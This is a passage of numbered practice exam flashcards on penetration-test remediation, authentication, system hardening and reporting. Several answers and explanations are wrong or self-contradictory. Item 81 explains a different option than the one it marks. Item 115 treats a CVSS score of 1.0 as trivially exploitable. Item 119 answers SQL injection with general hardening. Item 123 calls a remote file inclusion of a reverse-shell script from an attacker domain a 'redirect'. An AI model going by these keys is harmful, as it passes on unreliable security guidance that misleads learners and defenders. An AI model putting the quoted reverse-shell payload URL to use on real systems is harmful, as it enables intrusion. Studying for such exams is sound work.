The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.

69
Q

During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?

A.Purchase a commercial application that performs a similar task.
B.Rewrite the application to encrypt passwords before they are saved in the database.
C.Switch to the PostgreSQL database.
D.Switch to a hosted solution with a cloud service provider.

A

B.Rewrite the application to encrypt passwords before they are saved in the database.

Explanation:
Because the application was developed in-house, the client should be able to rewrite the code such that passwords are encrypted by the application before they are saved in the database.

70
Q

You have just concluded a penetration test for a client. In your findings, you report that, while users are trained to change their passwords every 45 days, few of them actually do it because there is no mechanism in place to enforce this policy. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts if users don’t change their passwords after 45 days?

A.chage
B.chmod
C.chgroup
D.chown

A

A.chage

Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts. For example, it can be used to lock a user account if the user doesn’t change their password after a certain number of days.

71
Q

Which of the following tools can be used to restore the original plain text password from the hash of that password?

A.proxychains
B.John the Ripper
C.A rainbow table
D.TheHarvester

A

C.A rainbow table

Explanation:
A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password.

72
Q

Which of the following is commonly used to prevent precomputation attacks on hashed passwords by adding random bits to the hashing operation?

A.Salting
B.Reversing the hash
C.Using OTP
D.Implementing multifactor authentication

A

A.Salting

Explanation:
Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).

73
Q

Which of the following is commonly used to prevent precomputation attacks on hashed passwords by running the value to be hashed through the hash function multiple times?

A.Salting
B.Key stretching
C.Symmetric encryption
D.Asymmetric encryption

A

B.Key stretching

Explanation:
Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of the rainbow table needed for a precomputation attack to work.

74
Q

You have just concluded a penetration test for a client. In your findings, you report that users are required to provide a username and a password to authenticate. You recommend that the organization implement multifactor authentication. Which of the following could they require users to supply when authenticating to accomplish this?

A.PIN.
B.Passphrase.
C.Fingerprint scan.
D.None of the above. Multifactor authentication is already in place by requiring a username and a password.

A

C.Fingerprint scan.

Explanation:
A username and a password are both examples of something you know and therefore do not constitute multifactor authentication. A fingerprint scan is an example of something you are. Requiring a fingerprint scan would improve the security of the system because authentication factors from multiple categories would be required for users to log on.

75
Q

In terms of multifactor authentication, which of the following is an example of something you know?

A.PIN
B.One-time password (OTP)
C.Biometric scan
D.RSA token

A

A.PIN

Explanation:
A PIN is an example of something you know.

76
Q

In terms of multifactor authentication, which of the following is an example of something you are?

A.Password
B.Challenge-response questions
C.Retina scan
D.Hardwire connection to the organization’s internal LAN

A

C.Retina scan

Explanation:
A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.

77
Q

In terms of multifactor authentication, which of the following is an example of somewhere you are?

A.Security token generator
B.Passphrase
C.Hardwire connection to the organization’s internal LAN
D.Voiceprint

A

C.Hardwire connection to the organization’s internal LAN

Explanation:
A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.

78
Q

In terms of multifactor authentication, which of the following is an example of somewhere you are?

A.RFID proximity reader
B.USB token generator
C.Disconnected token generator
D.Password

A

A.RFID proximity reader

Explanation:
An RFID proximity reader can be used to prevent a user from authenticating to a system unless they are physically present at the system.

79
Q

Which of the following is an example of multifactor authentication?

A.Username + PIN
B.RFID proximity reader + hardware connection to the LAN
C.Biometric scan + PIN
D.Password + challenge/response question

A

C.Biometric scan + PIN

Explanation:
Requiring a user to supply a biometric scan (something you are) along with a PIN (something you know) constitutes multifactor authentication.

80
Q

Which of the following is an example of multifactor authentication?

A.Username + password
B.Password + security token generator
C.USB token generator + disconnected token generator
D.Password + PIN

A

B.Password + security token generator

Explanation:
Requiring a user to supply a password (something you know) plus a security token generator (something you have) constitutes multifactor authentication.

81
Q

Which of the following is an example of two-factor authentication (2FA)?

A.Username + password
B.Username + PIN
C.Username + PIN + facial recognition scan
D.PIN + fingerprint scan + security token

A

D.PIN + fingerprint scan + security token

Explanation:
Two-factor authentication (2FA) requires users to supply factors from two different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), and a facial recognition scan (something you are) constitutes 2FA authentication.

82
Q

Which of the following is an example of three-factor authentication (3FA)?

A.Username + password + security token
B.Username + PIN + fingerprint scan + one-time password (OTP)
C.Username + PIN + facial recognition scan
D.Password + PIN + security token

A

B.Username + PIN + fingerprint scan + one-time password (OTP)

Explanation:
Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.

83
Q

You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?

A.Rewrite the code to sanitize user input.
B.Hash all data before transmitting it on the network.
C.Encrypt all data at rest in the database.
D.Replace the application with a commercial application that performs a similar function.

A

A.Rewrite the code to sanitize user input.

Explanation:
In this scenario, you could recommend that the application be rewritten such that all user inputs are sanitized before being submitted to the backend database. For example, suppose the application contains a field where users are supposed to enter their phone number. The programmers could validate that the information entered contains only numbers (and only the correct number for a phone number). This prevents malicious attackers from submitting SQL statements into these fields that could potentially expose the information in the database.

84
Q

You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?

A.Escape data.
B.Implement SSL for network communications.
C.Require 2FA when authenticating users.
D.Salt the hash.

A

A.Escape data.

Explanation:
In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.

85
Q

Which defense against SQL injection attacks involves using prepared SQL statements with bounded variables?

A.Sanitizing user input
B.Escaping data
C.Parameterizing queries
D.Key stretching

A

C.Parameterizing queries

Explanation:
Using parameterized queries is typically considered a better defense against SQL injection attacks than sanitizing user input. With parameterized queries, prepared statements are used with bounded variables to access the SQL database.

86
Q

You have just concluded a penetration test for a client. In your findings, you report that a Linux web server in the data center has the Apache web server, MySQL database, DNS, CUPS, DHCP, IMAP, and POP3 services running. What should you recommend the client do to remediate this situation?

A.Uninstall all unnecessary services from the server.
B.Close the ports in the server’s host-based firewall associated with unnecessary services.
C.Uninstall the DNS and DHCP services.
D.Uninstall the email-related services.

A

A.Uninstall all unnecessary services from the server.

Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, a web server probably doesn’t need DNS, DHCP, printing, or email services running. These should be removed.

87
Q

A Windows server is functioning as an Active Directory domain controller for an organization’s network. Which of the following services are not required for it to fulfill this role? (Choose two.)

A.Group Policy Management
B.Hyper-V
C.Role Administration Tools
D.Active Directory Federation Services

A

B.Hyper-V
D.Active Directory Federation Services

Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked (“federated”) with a different Active Directory domain.

88
Q

Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)

A.Use Group Policy to configure account lockout.
B.Enable anonymous SID/name translation.
C.Enable the built-in Guest user account.
D.Enable anonymous enumeration of SAM accounts and shares.
E.Delete or disable all unused user accounts.

A

A.Use Group Policy to configure account lockout.
E.Delete or disable all unused user accounts.

Explanation:
To harden user accounts on Windows-based computer systems, you should use Group Policy to configure account lockout. This will help slow down or even prevent brute-force or password guessing attacks. You should also immediately disable or delete all unused user accounts.

89
Q

Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)

A.Require users to authenticate using online Microsoft user accounts.
B.Use Group Policy to enforce password complexity requirements.
C.Allow “everyone” permissions to apply to anonymous users.
D.Use Group Policy to enforce password aging requirements.
E.Allow standard users to install updates.

A

B.Use Group Policy to enforce password complexity requirements.
D.Use Group Policy to enforce password aging requirements.

Explanation:
To harden user accounts on a Windows-based computer system, you should use Group Policy to enforce password complexity requirements. For example, you could require a certain password length and that it contain specific character combinations. You should also use Group Policy to enforce password aging requirements. This requires users to change their passwords on a regular basis.

90
Q

Which of the following methods is commonly used to harden network communications on Windows-based computer systems?

A.Enable NetBIOS over TCP/IP.
B.Allow anonymous access to shared folders.
C.Store LAN Manager hash values.
D.Set the LAN Manager authentication level to allow LM and NTLM.
E.Restrict network access to only authenticated users.

A

E.Restrict network access to only authenticated users.

Explanation:
To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network to only authenticated users.

91
Q

Which of the following methods is commonly used to harden network communications on Windows-based computer systems?

A.Close all ports in the Windows firewall and then open only those needed by installed services.
B.Open all ports in the Windows firewall and then close them one by one except for those needed by installed services.
C.Enable LMHOSTS lookup.
D.Enable the Windows firewall in only the public network profile.

A

A.Close all ports in the Windows firewall and then open only those needed by installed services.

Explanation:
To harden network communications on a Windows-based computer system, you should configure the Windows firewall properly. First, you should close all ports to ensure that nothing is accidentally left open. Then open ports for only those services that have been installed and are needed on the system.

92
Q

Which of the following methods are commonly used to harden Windows-based computer systems? (Choose two.)

A.Install extra system RAM and then disable the Windows paging file.
B.Grant the Administrator user the “act as part of the operating system” right.
C.Disable unneeded services.
D.Allow anonymous access to the registry.
E.Disable automatic notification of patch availability.

A

A.Install extra system RAM and then disable the Windows paging file.
C.Disable unneeded services.

Explanation:
To harden a Windows-based computer system, you should consider installing extra system RAM and then disabling the Windows paging file. This prevents sensitive data that is meant to exist only unencrypted in RAM from being written to the page file on the hard disk. You should also disable any unneeded services.

93
Q

Which of the following methods is commonly used to harden Windows-based computer systems?

A.Disable Ctrl+Alt+Del for interactive logons.
B.Install all available Windows components.
C.Disable BitLocker, if it is enabled.
D.Disable autorun.

A

D.Disable autorun.

Explanation:
To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.

94
Q

Which of the following methods is commonly used to harden Linux-based server systems?

A.Enable and configure iptables.
B.Enable Ctrl+Alt+Del in inittab.
C.Grant all users read-write access to the /boot directory.
D.Configure the IP protocol to respond to ICMP requests.

A

A.Enable and configure iptables.

Explanation:
To harden a Linux-based server system, you should make sure a host-based firewall is running by enabling and configuring iptables. You should first close all network ports in the firewall and then open only those required by specific services running on the system.

95
Q

Which of the following methods is commonly used to harden Linux-based server systems?

A.Enable the Telnet service.
B.Enable the secure shell (SSH) service.
C.Configure the IP protocol to respond to network broadcasts.
D.Enable user accounts with empty passwords.

A

B.Enable the secure shell (SSH) service.

Explanation:
To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system. SSH encrypts all network traffic between the SSH server and the SSH client. Telnet, on the other hand, transmits all data as clear text, including authentication credentials.

96
Q

You have just concluded a penetration test for a client. In your findings, you report that a Linux database server has a large number of unnecessary open services, increasing its attack surface. In your final report, you recommend that the client analyze the system and remove any applications or services that aren’t required for its role. Which tool should you suggest they use to check for listening network ports on the server?

A.netstat
B.yum
C.chage
D.iptables

A

A.netstat

Explanation:
To harden a server system, you should make sure only the services and applications necessary for its role are installed. The netstat command can be used to check for listening network ports on the system. This will reveal which services are running on the system.

97
Q

You have just concluded a penetration test for a client. In your findings, you report that you found several user accounts on a Linux file server that have no password assigned to them. In your final report, you recommend that the client analyze the system and assign passwords to all user accounts. Which file on the server should they review to accomplish this?

A./etc/passwd
B./etc/shadow
C./etc/group
D./etc/gshadow

A

B./etc/shadow

Explanation:
To harden a server system, you should make sure all user accounts have a password assigned to them. One way to do this is to review the /etc/shadow file and look for any accounts that don’t have a password assigned.

98
Q

You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project?

A.lockusr
B.chmod
C.chage
D.passwd

A

D.passwd

Explanation:
To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd -l command followed by the name of the user.

99
Q

You have just concluded a penetration test for a client. In your findings, you report that a Linux database server shows evidence of having been compromised in the past. The attacker tried to cover his or her tracks by manually modifying the local log files but missed one key entry that revealed the compromise. What should you recommend the client do?

A.Make the log files read-only.
B.Grant only the root user read-write access to the log files.
C.Reconfigure the system to send log entries to a dedicated log server.
D.Make the log files hidden files.

A

C.Reconfigure the system to send log entries to a dedicated log server.

Explanation:
One way to harden a server system is to reconfigure it to save its log entries to a dedicated logging server somewhere else on the network. This makes it harder for an attacker to cover his or her tracks after a compromise because the log files aren’t stored locally.

100
Q

You have just concluded a penetration test for a client that has many remote sites. Employees at the remote sites commonly use an FTP client to copy files back and forth between their site and the home office servers. During the test, you were able to sniff these FTP sessions and capture sensitive information. In your final report, what should you recommend the client do to remediate this issue?

A.Use FTPS for file transfers.
B.Prohibit file transfers between sites.
C.Use the rcp command for file transfers.
D.Use flash drives and a courier service for file transfers between sites.

A

A.Use FTPS for file transfers.

Explanation:
The FTP protocol does not encrypt data transfers between systems. This means authentication information as well as the data itself are exposed during transmission over the network. To remedy this, you should recommend that the client switch to FTPS instead of FTP. The FTPS protocol uses SSL or TLS to encrypt the FTP session.

101
Q

You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses Telnet to remotely access Linux servers. In your final report, what should you recommend the client do to remediate this issue?

A.Prohibit remote server access.
B.Use SFTP for remote server access.
C.Use rsh for remote server access.
D.Use SSH for remote server access.

A

D.Use SSH for remote server access.

Explanation:
The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.

102
Q

You have just concluded a penetration test for a client. During the test, you discovered that one of Linux system administrators uses rcp to copy files between Linux servers. In your final report, what should you recommend the client do to remediate this issue?

A.Use the scp command for file transfers.
B.Prohibit file transfers between servers.
C.Use the rsh command for file transfers.
D.Use the ftp command for file transfers.

A

A.Use the scp command for file transfers.

Explanation:
The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.

103
Q

You have just concluded a gray box penetration test for a client. During the test, you were able to access the organization’s wireless network controller device using a default administrator username and password. In your final report, what should you recommend the client do to remediate this issue?

A.Eliminate the transmission of plain text passwords by using SSH for remote connections.
B.Change the default administrative username and password on the controller.
C.Use directional antennae on all access points.
D.Implement MAC address filtering on the wireless network.

A

B.Change the default administrative username and password on the controller.

Explanation:
In this scenario, the wireless network can be hardened by changing the default administrative username and password on the wireless controller. Lists of default usernames and passwords are readily available on the Internet and should not be used.

104
Q

You have just concluded a black box penetration test for a client. The organization’s wireless network uses preshared keys. During the test, you were able to access the organization wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)

A.Implement MAC address filtering.
B.Implement 802.1x authentication.
C.Upgrade to newer Wi-Fi equipment that supports modern encryption methods.
D.Change the default administrative username and password on the access point.
E.Reconfigure the Wi-Fi equipment to use WPA encryption.

A

A.Implement MAC address filtering.
B.Implement 802.1x authentication.

Explanation:
In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates the weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).

105
Q

You have just concluded a black box penetration test for a client. During the test, you were able to access the organization’s wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)

A.Use directional antennae on all access points.
B.Reconfigure the Wi-Fi equipment to use WEP encryption.
C.Upgrade to newer Wi-Fi equipment that supports modern encryption methods.
D.Disable DHCP on the wireless network.

A

A.Use directional antennae on all access points.
D.Disable DHCP on the wireless network.

Explanation:
In this scenario, the wireless network can be hardened by using directional antennae on the access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.

106
Q

You have just concluded a penetration test for a client. During the test, you were able to gain access to the server room by masquerading as a technician from an IT vendor. You were able to plug your laptop into the serial connector on the organization’s Cisco router and access its configuration. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)

A.Disable DHCP on the wired network.
B.Run the enable secret command on the router.
C.Implement procedures to vet representatives from vendors.
D.Implement MAC address filtering on the router.

A

B.Run the enable secret command on the router.
C.Implement procedures to vet representatives from vendors.

Explanation:
In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.

107
Q

As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this?

A.Carefully document everything you do as you conduct the test.
B.Create back doors in critical systems so you can easily access them later.
C.Create images of all systems and devices so they can be restored to their pre-test state.
D.Erase any log entries created by your exploits.

A

A.Carefully document everything you do as you conduct the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.

108
Q

You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do? (Choose two.)

A.Remove any shell sessions created during the test.
B.Obscure everything you did during the test from the client.
C.Document everything you do during the cleanup.
D.Obscure everything you do to clean up after the test.

A

A.Remove any shell sessions created during the test.
C.Document everything you do during the cleanup.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.

109
Q

You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?

A.Ask the client to sign an agreement not to disclose the techniques you used during the test.
B.Remove any tester-created credentials used during the test.
C.Write a critique of the mistakes the internal administrators made during the test.
D.Obscure everything you did during the test from the client.

A

B.Remove any tester-created credentials used during the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.

110
Q

You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?

A.Remove any tools or utilities you installed during the test.
B.Reset all administrative credentials to their default values.
C.Reset all firewalls to the default configurations.
D.Reinstall all network services using default settings.

A

A.Remove any tools or utilities you installed during the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, it is critical that you uninstall any tools or utilities you used to conduct exploits during the test.

111
Q

You are meeting with your client after a penetration test is complete. During the meeting, you provide the client with detailed evidence related to the issues you discovered during the test. What is this process called?

A.Attestation of findings
B.Lessons learned
C.Client acceptance
D.Normalization of data

A

A.Attestation of findings

Explanation:
After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.

112
Q

You are meeting with your client after a penetration test is complete. At the conclusion of the meeting, you ask the client to agree in writing that you have fulfilled your responsibilities according to the contract you initially signed with the client. What is this process called?

A.Attestation of findings
B.Lessons learned
C.Client acceptance
D.Follow-up actions

A

C.Client acceptance

Explanation:
After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called client acceptance.

113
Q

Several months after completing a penetration test, your client calls and asks you to come back and retest their network to verify that the problems you initially discovered have been properly remediated. What is this process called?

A.Attestation of findings
B.Lessons learned
C.Follow-up actions
D.Normalization of data

A

C.Follow-up actions

Explanation:
After a penetration test is complete, it is not uncommon for the client to ask the tester to come back and retest everything to make sure the problems discovered during the test have been remediated. This process is sometimes called follow-up actions.

114
Q

After completing a penetration test for a client, you meet with your penetration testing team to review lessons learned. What should you do in this meeting? (Choose two.)

A.Document technical exploits that were effective during the test.
B.Discuss the best places to eat near the client’s location.
C.Identify exploits that were not effective during the test.
D.Review your team’s plans for the upcoming holiday celebration.

A

A.Document technical exploits that were effective during the test.
C.Identify exploits that were not effective during the test.

Explanation:
After a penetration test is complete, you should meet with your team and discuss lessons learned. You should identify what went well and what improvements need to be made. For example, you should discuss which exploits worked and which didn’t. You should document best practices for using those exploits such that you don’t have to relearn them the next time you conduct a penetration test.

115
Q

A detailed penetration report was given to a security analyst. The penetration was conducted against the target organization’s DMZ environment. The report had a finding that the Common Vulnerability Scoring System (CVSS) had a base score of 1.0. To exploit this vulnerability, which level of difficulty would be required?

A.Very difficult, because the perimeter systems are usually behind a firewall
B.Somewhat difficult, because it would require powerful processing to exploit
C.Trivial, because little effort would be required to exploit the findings
D.Impossible, because the external hosts are hardened to protect against attacks

A

C.Trivial, because little effort would be required to exploit the findings

Explanation:
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

116
Q

During the course of a penetration test, the tester needs to communicate with a client. Which of the following situations would cause this communication to occur? (Choose two.)

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.
C.The system shows a lack of complete hardening.
D.The tester discovered individually identifiable data on the system.
E.The tester discovers something that is on an out-of-scope system.

A

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.

Explanation:
Certain events call for immediate communication with the client. Common penetration testing communication triggers include the completion of a testing phase, the discovery of a critical finding, and the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

117
Q

A penetration tester has performed a security assessment for a client. The report lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all of the vulnerabilities. What should the tester suggest is the best option for the client given these circumstances?

A.Apply easy compensating controls for the critical vulnerabilities to minimize risk and then reprioritize remediation.
B.Identify the vulnerabilities that can be remediated quickest and address them first.
C.Implement the least impactful of the critical vulnerability remediation first and then address other critical vulnerabilities.
D.Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.

A

D.Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.

Explanation:
In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion for the client is to correct the most critical vulnerability first and then, when funds become available, fix the other critical vulnerabilities.

118
Q

A penetration tester has performed a security assessment for a client. It is observed that there are several high-numbered ports listening in on a public web server. The client indicates that they are only using port 443 for an application. What should the tester recommend to the client?

A.Disable the unneeded services.
B.Filter port 443 to specific IP addresses.
C.Implement a web application firewall.
D.Transition the application to another port.

A

A.Disable the unneeded services.

Explanation:
In this scenario, there are several high-numbered ports listening on a public web server, but the client uses only port 443. The best recommendation is therefore to disable the unneeded services. Unnecessary services pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

119
Q

What is the best recommendation to give to a client to mitigate a vulnerability if a penetration tester was able to enter a SQL injection command into a text box and gain access to the information stored on the database?

A.Implement input normalization.
B.Install host-based intrusion detection.
C.Perform system hardening.
D.Randomize the credentials used to log in.

A

C.Perform system hardening.

Explanation:
System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of system hardening by removing unused programs, accounts, functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:

Application hardening
Operating system hardening
Server hardening
Database hardening
Network hardening

120
Q

A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which mitigation strategies should be recommended for the report to the client? (Choose three.)

A.Apply additional network access control.
B.For all logons, require multifactor authentication.
C.For each machine, randomize local administrator credentials.
D.For local administrators, disable remote logons.
E.Increase minimum password complexity requirements.
F.Put each host into its own virtual local area network (VLAN).
G.On every workstation, enable full-disk encryption.

A

B.For all logons, require multifactor authentication.
E.Increase minimum password complexity requirements.
G.On every workstation, enable full-disk encryption.

Explanation:
In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following:

Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.

Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack.

Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

121
Q

A penetration tester is writing a report that outlines the overall level of risk to operations. In which part of the report should the tester include this information?

A.Appendixes
B.Executive summary
C.Main body
D.Technical summary

A

B.Executive summary

Explanation:
In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

122
Q

During penetration testing of a client’s core server, a tester discovers a critical vulnerability. What should the tester do next?

A.Finish testing, complete all findings, and then submit them to the client.
B.Immediately alert the client with details of the findings.
C.On the target machine, disable the network port of the affected service.
D.Take the target machine offline so it cannot be exploited.

A

B.Immediately alert the client with details of the findings.

Explanation:
In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

123
Q

A security analyst is monitoring the Web Application Firewall (WAF) logs and has discovered that there was a successful attack against the following URL: https://sample.com/index.php?Phone=http://iattackedyou.com/stuffhappens/revshell.php. What remediation steps should be taken to prevent this type of attack from happening again?

A.Block URL redirections.
B.Double URL encode the parameters.
C.From the application, stop external calls.
D.Implement a blacklist.

A

A.Block URL redirections.

Explanation:
In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

124
Q

By using phishing, a penetration tester was able to retrieve the initial VPN user domain credentials from a member of the IT department. Then the tester obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. The tester should recommend which of the following remediation steps to the client? (Choose three.)

A.Recommend increased password complexity requirements.
B.Recommend implementing two-factor authentication for remote access.
C.Recommend installing an intrusion prevention system.
D.Recommend installing a security information event monitoring solution.
E.Recommend preventing members of the IT department from interactively logging in as administrators.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

A

A.Recommend increased password complexity requirements.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

Explanation:

In this scenario, the tester should recommend that the client increase their password complexity requirements, since the tester was able to crack the hashes by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Sockets Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

125
Q

Upon completing testing on an Internet-facing application, the penetration tester notices that the application is using only basic authentication. What is the best remediation strategy that the tester should recommend to the client?

A.Enable HTTP Strict Transport Security (HSTS)
B.Enable a secure cookie flag
C.Encrypt the communication channel
D.Sanitize invalid user input

A

A.Enable HTTP Strict Transport Security (HSTS)

Explanation:
In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

126
Q

Once testing for a client is complete, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client?

A.The availability of patches and other remediations
B.The levels of difficulty to exploit the identified vulnerabilities
C.The risk tolerance of the client’s organization
D.The time it took to accomplish each step

A

C.The risk tolerance of the client’s organization

Explanation:
In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

127
Q

A junior technician in an organization’s IT department runs a penetration test on a corporate web application. During testing, the technician discovers that the application can disclose a SQL table with all user account and password information. How should the technician notify management?

A.The technician should connect to the SQL server using this information and change the passwords of a few noncritical accounts to demonstrate a proof of concept to management.
B.The technician should document the findings using an executive summary including recommendations and screenshots to provide to management.
C.The technician should notify the development team of the discovery and suggest that input validation be enforced on the web application’s SQL query strings.
D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

A

D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

Explanation:
